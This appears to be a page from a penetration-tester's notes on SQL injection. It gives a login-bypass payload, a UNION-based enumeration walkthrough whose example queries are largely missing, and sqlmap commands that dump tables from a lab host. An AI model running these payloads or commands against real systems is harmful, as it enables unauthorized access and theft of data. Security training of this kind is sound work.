Hacking SQL

Things to look for:

URL params that look like they feed requests
Any form that touches a database
Settings and experience based items that can be edited
Header items like User-Agents that might get stored in the DB
Fuzz characters: ' " # -- , SELECT UNION

Tools to help:

MSF SQL enumeration scripts
SQLMAP fully featured sql enum/injection tool

Impact:

Dump the database
Read the file system
Run OS commands
Create Admin login
Install Shells

Basic Commands:

The table dump/login: ' OR 'a'='a

Url injection:

Testing control and output. Here 9999 returns only the frame

Now we use an existing id and we try both a true statement and a false statement.

True:

False:

Now we add our union select and we keep incrementing the number of nulls until we get a true statement back.

Now we will check the types of each null by either giving it a number or a 'string' to see what the type is if it is enforced. Once we have our types we can switch back to ID 9999 to get our populated entries

Now we first want to try the @@version in a place where we have a string and then we will look up the pentest monkey sql commands for that version.

Here we are going to test this Current User query to get the db user:

Next we will try the list user table which will take some slight edits. //we could have queried to get the table name but he already had it.

This will give you the first user of the DB. We can add a WHERE clause and enumerate users but we are better off using sqlmap.

Authentication bypass:

If we have a login portal, sign in, or attempt to, and send the traffic to burp. Then you can map the login and use sqlmap to fuzz for injectables.

sqlmap -u "http://3.lab.auth.site/ajax.php?fun=login&username=david&password=test" --keep-alive

sqlmap -u "http://3.lab.auth.site/ajax.php" --data="fun=login&username=david&password=test" --keep-alive

In method one we use the GET request like how we see it being generated from ajax.php . This may not always work. We will also want to try POSTing the same param data. And also try to sql inject at different data points like the user-agent, refer, and so on. For this example the method 2 POST of data works to get SQLi on username. Likely bypassing the security mechanism that is setup to look at GETs.

We can now specify the vuln param and what we want to dump from it

sqlmap -u "http://3.lab.auth.site/ajax.php" --data="fun=login&username=david&password=test" -p username --dbs --tables --columns --keep-alive
sqlmap -u "http://3.lab.auth.site/ajax.php" --data="fun=login&username=david&password=test" -D ratingAgency3 -T analyst --dump --keep-alive

Loot:

PreviousSecuring SQL Nextsqlmap

Last updated 2 years ago